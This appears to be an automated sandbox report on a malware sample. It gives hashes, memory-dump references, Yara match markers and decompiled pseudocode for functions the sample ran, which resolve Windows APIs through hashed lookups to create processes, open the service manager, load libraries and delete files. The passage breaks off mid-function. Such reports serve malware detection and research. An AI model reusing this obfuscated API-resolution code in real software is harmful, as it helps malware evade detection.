Opcode Fuzzy Hash: 659cdf3476c03579d20660d94ef23585ed07c64f9f43491cbdbffdcf1d16f9d5
Instruction Fuzzy Hash: 10618E71D04159AEDF41CFF98844FDEBBB9AF0A398F00454AE815AA342D371D932CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E44D3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E44D405

Strings

MOC, xrefs: 6E44D417
RCC, xrefs: 6E44D41F

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a2380c935a9cf42cc8cdfc216ccc8e95bbc4e617772091aae03dd7c97159090b
Instruction ID: 070807b109ec72ae1a120dc72e744981c72bca0cb287f6f488d2df889f740523
Opcode Fuzzy Hash: a2380c935a9cf42cc8cdfc216ccc8e95bbc4e617772091aae03dd7c97159090b
Instruction Fuzzy Hash: 47414771A0020AEFEF06CFA4C981EEE7BB5FF48308F14805AF91566264D735A951DF92

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 1500 Parent PID: 2684 rundll32.exeCOMMON

Executed Functions

Function 001BB302, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E001BB302(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, long _a16, long _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, long _a44) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t46;
				WCHAR* _t51;

				_push(_a44);
				_t51 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E001A358A(_t39);
				_v12 = 0xabd0b8;
				_v12 = _v12 + 0xffff6325;
				_v12 = _v12 * 0x60;
				_v12 = _v12 ^ 0x403e2218;
				_v8 = 0xe243e7;
				_v8 = _v8 ^ 0x6b1afc39;
				_v8 = _v8 << 4;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x000f51a2;
				_v16 = 0xa9cd65;
				_v16 = _v16 + 0xffffba9e;
				_v16 = _v16 ^ 0x00a555a0;
				E001B0A93(0xa533cd3f, 0x1ae, __ecx, __ecx, 0x97da6f6d);
				_t46 = CreateFileW(_t51, _a12, _a44, 0, _a20, _a16, 0); // executed
				return _t46;
			}

0x001bb30a
0x001bb30f
0x001bb311
0x001bb314
0x001bb317
0x001bb31a
0x001bb31b
0x001bb31e
0x001bb321
0x001bb324
0x001bb327
0x001bb32a
0x001bb32d
0x001bb32e
0x001bb32f
0x001bb334
0x001bb33e
0x001bb350
0x001bb358
0x001bb35f
0x001bb366
0x001bb36d
0x001bb371
0x001bb375
0x001bb37c
0x001bb383
0x001bb38a
0x001bb39f
0x001bb3b6
0x001bb3bd

APIs

CreateFileW.KERNELBASE(?,0E59E965,?,00000000,?,2DC38490,00000000), ref: 001BB3B6

Strings

C, xrefs: 001BB35F

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: C
API String ID: 823142352-2531096973
Opcode ID: 02643da8fa393edeb85a6142ec268a378f78e8aefceffacbf34586c294ec5509
Instruction ID: a87ea46311fdc0050e346b6d1ac82f2eb58704febec9ca64c9dc306d725dea63
Opcode Fuzzy Hash: 02643da8fa393edeb85a6142ec268a378f78e8aefceffacbf34586c294ec5509
Instruction Fuzzy Hash: D121E07690120DBBCF069FA5CD4ACCEBFB5FF88314F508188FA1462120D3729A65EB91

Uniqueness

Uniqueness Score: -1.00%

Function 001AB3B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001AB3B4(void* __ecx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t38;
				intOrPtr* _t45;
				void* _t46;
				signed int _t48;

				E001A358A(_t38);
				_v24 = 0xbdc4da;
				_v20 = 0;
				_v12 = 0x382322;
				_v12 = _v12 | 0x1bf5fedf;
				_v12 = _v12 + 0xffff2b97;
				_v12 = _v12 ^ 0x1bf9dfc9;
				_v16 = 0x4a5b;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0x000ec5f6;
				_v8 = 0xbae621;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 >> 8;
				_t48 = 0x3e;
				_v8 = _v8 / _t48;
				_v8 = _v8 ^ 0x00037881;
				_t45 = E001B0A93(0x7489b63, 0x163, _t48, _t48, 0xd520ec7a);
				_t46 =  *_t45(0, _a28, 0, 0, _a20, __ecx, 0, 0, _a8, 0, _a16, _a20, _a24, _a28); // executed
				return _t46;
			}

0x001ab3d0
0x001ab3d5
0x001ab3df
0x001ab3e4
0x001ab3eb
0x001ab3f2
0x001ab3f9
0x001ab400
0x001ab407
0x001ab40a
0x001ab411
0x001ab418
0x001ab41c
0x001ab425
0x001ab42d
0x001ab430
0x001ab44c
0x001ab45d
0x001ab463

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001AB45D

Strings

"#8, xrefs: 001AB3E4

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID: "#8
API String ID: 1514166925-1378059363
Opcode ID: 07da8fd4362dfd3497e595d6f3d2045292be9ff23c55eb80a57e7e5fbfc2e38b
Instruction ID: 4bc52c4d5aba22c547f69e732d7f8fbb1bede52aa641656fade99667fa3b0aff
Opcode Fuzzy Hash: 07da8fd4362dfd3497e595d6f3d2045292be9ff23c55eb80a57e7e5fbfc2e38b
Instruction Fuzzy Hash: EC1153B2C01208BBDB19DFA5CD0A8DEBFB5EF15394F108089F91866250D3B29A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B4B76, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001B4B76(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				intOrPtr* _t39;
				void* _t40;

				E001A358A(_t33);
				_v28 = 0x381241;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x453462;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x000501d9;
				_v12 = 0x8feda7;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x23f597c5;
				_v8 = 0x502add;
				_v8 = _v8 + 0xffffa6fe;
				_v8 = _v8 * 0x6f;
				_v8 = _v8 + 0xffff779f;
				_v8 = _v8 ^ 0x2296bd6d;
				_t39 = E001B0A93(0x58aae1cd, 0x1ce, __ecx, __ecx, 0x97da6f6d);
				_t40 =  *_t39(_a20, 0, _a12, 0x28, __ecx, 0, _a4, _a8, _a12, _a16, _a20, 0x28); // executed
				return _t40;
			}

0x001b4b92
0x001b4b97
0x001b4ba1
0x001b4ba4
0x001b4ba7
0x001b4bae
0x001b4bb2
0x001b4bb9
0x001b4bc0
0x001b4bc4
0x001b4bcb
0x001b4bd2
0x001b4be9
0x001b4bf1
0x001b4bf8
0x001b4c08
0x001b4c19
0x001b4c1f

APIs

SetFileInformationByHandle.KERNELBASE(00381241,00000000,000B92B0,00000028,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 001B4C19

Strings

b4E, xrefs: 001B4BA7

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: FileHandleInformation
String ID: b4E
API String ID: 3935143524-160334004
Opcode ID: d36f43c77f73165b659ea08707c734cd2f2d8c8304ba232134e46448cbeb0ea3
Instruction ID: 619ab6636a6ec8f7055d3290abf809cde6264c495ddd7b635a2ff282d923399b
Opcode Fuzzy Hash: d36f43c77f73165b659ea08707c734cd2f2d8c8304ba232134e46448cbeb0ea3
Instruction Fuzzy Hash: 99111676C01209FBCB55DFA8DD0A99EBFB4FF14710F108189F91466250E3719B64AF80

Uniqueness

Uniqueness Score: -1.00%

Function 001AEDC5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
serviceCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001AEDC5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t33;
				int _t42;
				signed int _t44;
				void* _t49;

				_push(_a8);
				_t49 = __edx;
				_push(_a4);
				_push(__edx);
				E001A358A(_t33);
				_v12 = 0x5df5e5;
				_v12 = _v12 ^ 0xf8d95364;
				_t44 = 0x37;
				_v12 = _v12 / _t44;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x274181a0;
				_v8 = 0x1c6c87;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x00096b33;
				_v16 = 0x7d4b9;
				_v16 = _v16 | 0x6c5f76b9;
				_v16 = _v16 ^ 0x6c55770c;
				E001B0A93(0x35d15c45, 0x27c, _t44, _t44, 0x2a841103);
				_t42 = CloseServiceHandle(_t49); // executed
				return _t42;
			}

0x001aedcc
0x001aedcf
0x001aedd1
0x001aedd4
0x001aedd6
0x001aeddb
0x001aede5
0x001aedf3
0x001aedfb
0x001aee0e
0x001aee11
0x001aee18
0x001aee1f
0x001aee23
0x001aee27
0x001aee2b
0x001aee32
0x001aee39
0x001aee40
0x001aee50
0x001aee59
0x001aee5f

APIs

CloseServiceHandle.ADVAPI32(0009EFCC,?,?,?,?,?,?,?,?), ref: 001AEE59

Strings

3k, xrefs: 001AEE2B

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleService
String ID: 3k
API String ID: 1725840886-649693203
Opcode ID: 8ffe69a14a888f9965134856eac2c25365315f874c6c4a12286274900beeaecf
Instruction ID: 87ffdf8fa76c2aab0713aff4e5baa103e2f9bd953383e4a7813f7b68c8a385f2
Opcode Fuzzy Hash: 8ffe69a14a888f9965134856eac2c25365315f874c6c4a12286274900beeaecf
Instruction Fuzzy Hash: 88111572D01208FBDB19EFA8D94A9DEBFB4EF54344F10C09AE419A6250E3B55B508B80

Uniqueness

Uniqueness Score: -1.00%

Function 001A505F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001A505F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t29;

				_v12 = 0xab28db;
				_v12 = _v12 * 0xb;
				_v12 = _v12 | 0x438b2011;
				_v12 = _v12 ^ 0x47dfe9f9;
				_v8 = 0x2279c5;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x1ef6af05;
				_v16 = 0x91523b;
				_v16 = _v16 ^ 0x417bd16a;
				_v16 = _v16 ^ 0x41eb784b;
				E001B0A93(0x9aad6eb1, 0x12d, _t29, _t29, 0x97da6f6d);
				ExitProcess(0);
			}

0x001a5065
0x001a507c
0x001a5084
0x001a508b
0x001a5092
0x001a509d
0x001a50a0
0x001a50a4
0x001a50ab
0x001a50b2
0x001a50b9
0x001a50c9
0x001a50d3

APIs

ExitProcess.KERNELBASE(00000000), ref: 001A50D3

Strings

KxA, xrefs: 001A50B9

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID: KxA
API String ID: 621844428-223459762
Opcode ID: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
Instruction ID: d1a5a787cc89035a28c36461e018e720a4c3e3bb849dc78b0d123b7f70fe3c29
Opcode Fuzzy Hash: 72bf4aae16cd11734e86aa57fe45557da35340bda08c7e5569cc87c1b667450f
Instruction Fuzzy Hash: 7801F274D05208FBCB48DFE9D94698DFFB4EB44304F218199E511A72A0D7702B949B05

Uniqueness

Uniqueness Score: -1.00%

Function 001A2C3A, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38
stringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E001A2C3A(void* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001A358A(_t23);
				_v16 = 0x4d9c80;
				_v16 = _v16 | 0xcc7fbb6c;
				_v16 = _v16 ^ 0xcc74081e;
				_v12 = 0xfa0b63;
				_v12 = _v12 | 0xd4c459ea;
				_v12 = _v12 ^ 0xd4f66af0;
				_v8 = 0x175dc5;
				_v8 = _v8 | 0x605a8863;
				_v8 = _v8 ^ 0x60557826;
				E001B0A93(0xaea26b2f, 0x23c, __ecx, __ecx, 0x97da6f6d);
				_t29 = lstrcmpiW(_t33, _a8); // executed
				return _t29;
			}

0x001a2c41
0x001a2c44
0x001a2c46
0x001a2c49
0x001a2c4c
0x001a2c4d
0x001a2c4e
0x001a2c53
0x001a2c5d
0x001a2c64
0x001a2c6b
0x001a2c72
0x001a2c79
0x001a2c80
0x001a2c87
0x001a2c8e
0x001a2caf
0x001a2cbb
0x001a2cc1

APIs

lstrcmpiW.KERNELBASE(?,CC74081E,?,?,?,?,?,?,?,?,00000000), ref: 001A2CBB

Strings

&xU`, xrefs: 001A2C8E

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi
String ID: &xU`
API String ID: 1586166983-1954668127
Opcode ID: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
Instruction ID: d9ceebd18994e2f8c748ee5ee0712fb99e360f09ede33c460882192374272eb0
Opcode Fuzzy Hash: 33fbf76182eafc49d529afff0049f42f4ee3fc7ed41e886679a16bb7a8d61cf5
Instruction Fuzzy Hash: AF011675D01248BBDB05DFD5994A9DEBFB4EF44310F00C088E81966221D7719B109B95

Uniqueness

Uniqueness Score: -1.00%

Function 001AF66B, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E001AF66B(WCHAR* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a40, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, int _a56, WCHAR* _a60) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;
				WCHAR* _t67;

				_push(_a60);
				_t67 = __ecx;
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E001A358A(_t46);
				_v12 = 0xe19ae5;
				_v12 = _v12 + 0xe09a;
				_t59 = 0x16;
				_v12 = _v12 * 0x55;
				_v12 = _v12 ^ 0x4b33a1b3;
				_v8 = 0x3d4fbd;
				_v8 = _v8 ^ 0xea855bbf;
				_t60 = 0x67;
				_v8 = _v8 / _t59;
				_v8 = _v8 ^ 0x0aa3a294;
				_v16 = 0x5e6fbc;
				_v16 = _v16 / _t60;
				_v16 = _v16 ^ 0x00005386;
				E001B0A93(0xae3271c4, 0x240, _t60, _t60, 0x97da6f6d);
				_t57 = CreateProcessW(_t67, _a60, 0, 0, _a56, 0, 0, 0, _a40, _a44); // executed
				return _t57;
			}

0x001af673
0x001af678
0x001af67a
0x001af67d
0x001af67e
0x001af681
0x001af684
0x001af687
0x001af688
0x001af689
0x001af68c
0x001af68f
0x001af692
0x001af695
0x001af698
0x001af699
0x001af69c
0x001af69d
0x001af69e
0x001af6a3
0x001af6ad
0x001af6bc
0x001af6bf
0x001af6c2
0x001af6c9
0x001af6d0
0x001af6dc
0x001af6dd
0x001af6e2
0x001af6e9
0x001af6fa
0x001af6fd
0x001af719
0x001af733
0x001af73a

APIs

CreateProcessW.KERNEL32(2D09D167,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 001AF733

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
Instruction ID: c1b6ec5d211162464b7f472155bda7afb1941ca461469288e3fb387892350f3e
Opcode Fuzzy Hash: 23bdea19f37545656c8519616df4547577199db0088a864ae2cd4e3c52a4600c
Instruction Fuzzy Hash: FC21F836900148FBDF15DF95CC0ACDFBFBAEB89700F008049FA1466250D7B69A60DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001B092D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E001B092D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t39;
				int _t49;
				signed int _t51;
				WCHAR* _t56;

				_push(_a8);
				_t56 = __edx;
				_push(_a4);
				_push(__edx);
				E001A358A(_t39);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v32 = 0x43d765;
				_v28 = 0xc975c2;
				_v16 = 0xdf0d59;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0xdf01cfb6;
				_v12 = 0xcd4ee3;
				_v12 = _v12 ^ 0x732e69d9;
				_t51 = 0x64;
				_v12 = _v12 * 0x60;
				_v12 = _v12 + 0xef83;
				_v12 = _v12 ^ 0x7529d197;
				_v8 = 0xbc2c6f;
				_v8 = _v8 / _t51;
				_v8 = _v8 << 3;
				_v8 = _v8 * 0x44;
				_v8 = _v8 ^ 0x03f3cd2c;
				E001B0A93(0x6de7a650, 0x2b3, _t51, _t51, 0x97da6f6d);
				_t49 = DeleteFileW(_t56); // executed
				return _t49;
			}

0x001b0934
0x001b0937
0x001b0939
0x001b093c
0x001b093e
0x001b0943
0x001b094a
0x001b0950
0x001b0957
0x001b095e
0x001b0965
0x001b0969
0x001b0970
0x001b0977
0x001b0984
0x001b098b
0x001b098e
0x001b0995
0x001b099c
0x001b09a9
0x001b09b1
0x001b09be
0x001b09c1
0x001b09d1
0x001b09da
0x001b09e0

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 001B09DA

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5f56ed54cd363aad2261f3ec9dde364283ada060069db9c561de5b3c362c1294
Instruction ID: f545bf98efe58fed5f9366ccfb6af7f60b01fa2d2e52849e1fafc1e5d8e67514
Opcode Fuzzy Hash: 5f56ed54cd363aad2261f3ec9dde364283ada060069db9c561de5b3c362c1294
Instruction Fuzzy Hash: 67114975D01208FBDB04EFA4DA4AAEEFFB4EB00314F208199E414A7241D7B45B04DF84

Uniqueness

Uniqueness Score: -1.00%

Function 001C021F, Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E001C021F(void* __ecx, void* __edx, long _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t35;
				void* _t43;
				signed int _t45;
				void* _t50;

				_push(_a16);
				_t50 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001A358A(_t35);
				_v12 = 0xc0e5f1;
				_v12 = _v12 + 0xda00;
				_v12 = _v12 ^ 0x48d5c3e6;
				_v12 = _v12 ^ 0x481bdc7d;
				_v8 = 0x17bc7;
				_v8 = _v8 >> 0xb;
				_t45 = 0x7b;
				_v8 = _v8 / _t45;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x0006db1e;
				_v16 = 0xca237e;
				_v16 = _v16 + 0xef11;
				_v16 = _v16 ^ 0x00ccab0e;
				E001B0A93(0x8caed929, 0x317, _t45, _t45, 0x97da6f6d);
				_t43 = RtlAllocateHeap(_t50, _a8, _a4); // executed
				return _t43;
			}

0x001c0226
0x001c0229
0x001c022b
0x001c022e
0x001c0231
0x001c0235
0x001c0236
0x001c023b
0x001c0245
0x001c024e
0x001c0255
0x001c025c
0x001c0263
0x001c026c
0x001c0274
0x001c0277
0x001c027b
0x001c0282
0x001c0289
0x001c0290
0x001c02ac
0x001c02bb
0x001c02c1

APIs

RtlAllocateHeap.NTDLL(00000000,00CCAB0E,481BDC7D,?,?,?,?,?,?,?,?,?,00000008), ref: 001C02BB

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
Instruction ID: af6d43c3847032bf5e4eb3b4e1711d11516339f531e1848673aa8d5cb8d787fc
Opcode Fuzzy Hash: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
Instruction Fuzzy Hash: 441103B6D0120CFFDF05DFA4C94A8DEBBB5EB44314F108089F91466250E3B59B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 001AACDB, Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E001AACDB(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t39;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E001A358A(_t32);
				_v28 = 0x3efa7c;
				_v24 = 0x1427a1;
				_v20 = 0;
				_v16 = 0x3999dc;
				_v16 = _v16 * 0x69;
				_v16 = _v16 ^ 0x17a33522;
				_v8 = 0x98febf;
				_v8 = _v8 | 0xa9f18d33;
				_v8 = _v8 + 0xffff27c9;
				_v8 = _v8 + 0xffff7e19;
				_v8 = _v8 ^ 0xa9f83f7b;
				_v12 = 0x9aad70;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00028f30;
				E001B0A93(0x1ae4c564, 0x18, __ecx, __ecx, 0x2a841103);
				_t39 = OpenSCManagerW(0, 0, _a8); // executed
				return _t39;
			}

0x001aace2
0x001aace7
0x001aace8
0x001aaceb
0x001aacef
0x001aacf0
0x001aacf5
0x001aacff
0x001aad06
0x001aad09
0x001aad1d
0x001aad25
0x001aad2c
0x001aad33
0x001aad3a
0x001aad41
0x001aad48
0x001aad4f
0x001aad56
0x001aad5a
0x001aad5e
0x001aad6e
0x001aad7b
0x001aad81

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,17A33522), ref: 001AAD7B

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a651a9cbf6b6e1e0a2c05f2e577fa9f9acdeeabfbbfe254e42d889b7a50bbc8b
Instruction ID: ffe62c6d777c743f1ef9c5ef47441ae9faf01047b58a5cbef8cc24dbdf7862ea
Opcode Fuzzy Hash: a651a9cbf6b6e1e0a2c05f2e577fa9f9acdeeabfbbfe254e42d889b7a50bbc8b
Instruction Fuzzy Hash: 2511107AC12218BB9B45EFA8D9468EEBFB4EB55310F508089E814A7261D3B14B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 001C2DAA, Relevance: 1.5, APIs: 1, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E001C2DAA(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t21;
				struct HINSTANCE__* _t27;
				WCHAR* _t31;

				_push(_a8);
				_t31 = __ecx;
				_push(_a4);
				_push(__ecx);
				E001A358A(_t21);
				_v16 = 0xe4edb8;
				_v16 = _v16 + 0xffff324f;
				_v16 = _v16 ^ 0x00e4d338;
				_v12 = 0x4aa4e3;
				_v12 = _v12 | 0x47be1ae1;
				_v12 = _v12 ^ 0x47f82da6;
				_v8 = 0x5f13c8;
				_v8 = _v8 + 0xffffe959;
				_v8 = _v8 ^ 0x0055a0fc;
				E001B0A93(0xf7ec3422, 5, __ecx, __ecx, 0x97da6f6d);
				_t27 = LoadLibraryW(_t31); // executed
				return _t27;
			}

0x001c2db1
0x001c2db4
0x001c2db6
0x001c2dba
0x001c2dbb
0x001c2dc0
0x001c2dca
0x001c2dd1
0x001c2dd8
0x001c2ddf
0x001c2de6
0x001c2ded
0x001c2df4
0x001c2dfb
0x001c2e19
0x001c2e22
0x001c2e28

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 001C2E22

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
Instruction ID: 8ee7f4df61553055d2981bc8bc71473f2e45b40d1181995350df14720f057428
Opcode Fuzzy Hash: fa0b9ba42ca251ba5c1ef1ce6445bbbddcbdfd736c10d6ad21ab5a4b44c371a5
Instruction Fuzzy Hash: E4016D76C01218FBDB55EFA4C90A8DEBFB4FF50310F108189E81476251E7B16B149F91

Uniqueness

Uniqueness Score: -1.00%

Function 001C24DA, Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E001C24DA(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t23;
				int _t30;

				_push(_a4);
				_push(__ecx);
				E001A358A(_t23);
				_v8 = 0xc4f0fa;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0007e256;
				_v16 = 0x37fca4;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x19c0655f;
				_v12 = 0x6113c8;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0x030cf283;
				E001B0A93(0x3574d821, 0x2ab, __ecx, __ecx, 0xd520ec7a);
				_t30 = SHFileOperationW(_a4); // executed
				return _t30;
			}

0x001c24e0
0x001c24e4
0x001c24e5
0x001c24ea
0x001c24f4
0x001c24f8
0x001c24fc
0x001c2503
0x001c251a
0x001c2522
0x001c2529
0x001c2530
0x001c2534
0x001c2544
0x001c254f
0x001c2554

APIs

SHFileOperationW.SHELL32(030CF283), ref: 001C254F

Memory Dump Source

Source File: 00000006.00000002.692050034.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 47b0c01ace4abf3e4dbc4ed7b2d83f718e56d9fd093057a3048b8d45c22fc215
Instruction ID: cc1e6047d951df6404b9ceb6907faddc441897fa11326234352929aa3d0a00e4
Opcode Fuzzy Hash: 47b0c01ace4abf3e4dbc4ed7b2d83f718e56d9fd093057a3048b8d45c22fc215
Instruction Fuzzy Hash: 9801FB75D0120CBFCB05EFE4C94A99DBBB5EB54304F20C198E425A7211D7B55B54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 001B4A33, Relevance: 1.3, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001B4A33(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t25;
				int _t31;

				_push(_a4);
				_push(__ecx);
				E001A358A(_t25);
				_v16 = 0x36d040;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x000ed2c4;
				_v12 = 0x8d9e7;
